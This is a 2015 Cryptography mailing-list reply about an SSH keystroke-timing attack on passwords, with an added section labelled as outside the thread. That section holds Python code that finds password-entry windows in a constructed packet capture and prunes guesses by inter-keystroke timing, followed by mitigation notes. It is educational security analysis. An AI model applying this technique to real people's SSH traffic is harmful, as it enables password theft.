[Cryptography] SSH vulnerability when using passwords
jkatz at cs.umd.edu
Tue Jan 6 20:01:09 EST 2015
On Tue, Jan 6, 2015 at 6:42 PM, John Gilmore <gnu at toad.com> wrote:
> A friend pointed me to this page:
> But neither that nor the ssh wikipedia page mention an SSH
> vulnerability that lets an attacker guess the letters of a remote
> login password used under SSH. I remember this attack being mentioned
> years ago, perhaps in a crypto conference rump session?
> The attack works when you don't use keys or shared secrets -- just the
> usual login/password processing standard for the remote end's
> operating system. This is by far the simplest way to use SSH -- it
> requires no public keys, no private keys, no one-time pads. All it
> requires is that you can remember your login name and password, which
> everyone is already used to. It lets you log in to a remote system
> from *anywhere* that has a copy of ssh, without bringing any keying
> material along.
> The problem is that the ssh protocol sends each letter of the password
> as an entire packet of encrypted stuff -- but there are only a small
> number of possible letters that might have been typed. So the entropy
> in each of those early ssh packets is very low. The attack makes
> guesses about which letters you might have picked, is able to
> eliminate many of the guesses by showing that the crypto would have
> produced something different in that case, relies partly on the
> inter-letter timing as I recall, and recovers passwords or partial
> passwords a significant fraction of the time. Then, of course, those
> passwords are extremely useful in breaking into the remote system at
> any time afterward. Which is why NSA would store them for later use.
Could it possibly be this one?
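The mechanism John describes, as an added example that is not part of the thread and not anyone's posted code: in an interactive SSH session every keystroke is sent in its own encrypted packet, and when a program inside that session (su, sudo, a nested ssh) reads a password with echo turned off, the client's keystroke packets are the only ones in the stream that get no server echo. Packet metadata alone therefore reveals when the password was typed, how many characters it has, and the inter-keystroke latencies; the timing can then be used to discard guesses. This matches the published keystroke-timing analysis of interactive SSH sessions (Song, Wagner and Tian, USENIX Security 2001). The packet capture below is constructed, not real traffic, and the hand-alternation timing model (same-hand bigrams slower than different-hand ones, with a 150 ms cut-off) is a deliberately crude assumption used only to show how timing prunes a candidate list; the real classifier is far more involved.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Packet:
    t: float        # capture time in seconds
    direction: str  # "c2s" (client -> server) or "s2c" (server -> client)
    size: int       # bytes on the wire; the ciphertext itself is opaque to us


# Constructed sample capture (not real traffic): the user types "su<Enter>",
# a five-character password at the no-echo prompt, then "ls<Enter>".
# Sizes are constant because SSH pads every keystroke packet the same way;
# the leak is in the timing and in the absence of an echo.
SAMPLE = [
    Packet(0.000, "c2s", 52), Packet(0.010, "s2c", 52),   # 's' echoed by the shell
    Packet(0.180, "c2s", 52), Packet(0.190, "s2c", 52),   # 'u' echoed
    Packet(0.400, "c2s", 52), Packet(0.420, "s2c", 68),   # Enter -> "Password:" prompt
    Packet(1.000, "c2s", 52),                             # password keystrokes: nothing
    Packet(1.110, "c2s", 52),                             # comes back from the server
    Packet(1.230, "c2s", 52),
    Packet(1.420, "c2s", 52),
    Packet(1.630, "c2s", 52),
    Packet(1.800, "c2s", 52), Packet(1.850, "s2c", 84),   # Enter -> new (root) prompt
    Packet(2.500, "c2s", 52), Packet(2.510, "s2c", 52),   # 'l' echoed
    Packet(2.640, "c2s", 52), Packet(2.650, "s2c", 52),   # 's' echoed
    Packet(2.800, "c2s", 52), Packet(2.830, "s2c", 200),  # Enter -> command output
]


def unechoed_runs(packets: List[Packet], echo_window: float = 0.5,
                  min_run: int = 3) -> List[List[float]]:
    """Return runs of client keystroke times that the server never echoed.

    A keystroke counts as echoed if an s2c packet arrives after it, before the
    next c2s packet and within echo_window seconds. Runs shorter than min_run
    are ignored as noise (a stray unechoed control key, for instance).
    """
    pk = sorted(packets, key=lambda p: p.t)
    c2s_idx = [i for i, p in enumerate(pk) if p.direction == "c2s"]
    runs: List[List[float]] = []
    current: List[float] = []
    for n, i in enumerate(c2s_idx):
        t0 = pk[i].t
        limit = t0 + echo_window
        if n + 1 < len(c2s_idx):
            limit = min(limit, pk[c2s_idx[n + 1]].t)
        echoed = any(p.direction == "s2c" and t0 < p.t <= limit for p in pk[i + 1:])
        if echoed:
            if len(current) >= min_run:
                runs.append(current)
            current = []
        else:
            current.append(t0)
    if len(current) >= min_run:
        runs.append(current)
    return runs


def latencies_ms(run: List[float]) -> List[int]:
    """Inter-keystroke latencies of one run, in whole milliseconds."""
    return [round((b - a) * 1000) for a, b in zip(run, run[1:])]


# Toy timing model (an assumption for illustration only): bigrams typed with
# the same hand are slower than bigrams that alternate hands.
LEFT_HAND = set("qwertasdfgzxcvb")
RIGHT_HAND = set("yuiophjklnm")
SAME_HAND_MS = 150


def hand_pattern_from_timing(lat: List[int]) -> List[str]:
    return ["same" if ms >= SAME_HAND_MS else "diff" for ms in lat]


def hand_pattern_from_text(word: str) -> List[str]:
    def hand(ch: str) -> str:
        return "L" if ch in LEFT_HAND else "R" if ch in RIGHT_HAND else "?"
    return ["same" if hand(a) == hand(b) else "diff" for a, b in zip(word, word[1:])]


def filter_candidates(candidates: List[str], lat: List[int]) -> List[str]:
    """Keep only guesses whose hand pattern is consistent with the observed timing."""
    observed = hand_pattern_from_timing(lat)
    return [w for w in candidates
            if len(w) == len(lat) + 1 and hand_pattern_from_text(w) == observed]


def analyse(packets: List[Packet], candidates: List[str]) -> Optional[Dict]:
    """Locate the password-entry window and prune a guess list with its timing."""
    runs = unechoed_runs(packets)
    if not runs:
        return None
    run = runs[0]
    lat = latencies_ms(run)
    return {
        "password_length": len(run),          # one unechoed packet per character
        "latencies_ms": lat,
        "surviving_guesses": filter_candidates(candidates, lat),
    }


if __name__ == "__main__":
    print(analyse(SAMPLE, ["tiger", "tigre", "apple", "zebra", "pasta"]))
```

Two caveats a practitioner should keep in mind. First, the per-keystroke exposure applies to passwords typed inside an already established interactive session: SSH2 password authentication itself sends the whole password in a single SSH_MSG_USERAUTH_REQUEST, so the initial login is not split character by character. Second, the echo heuristic and the hand-alternation cut-off above are crude; the published attack trains a proper statistical model on latencies and still recovers only partial information, which is why the example keeps two surviving guesses rather than one. OpenSSH 9.5 added the ObscureKeystrokeTiming option, which sends chaff packets at a fixed cadence during interactive sessions precisely to blunt this kind of analysis.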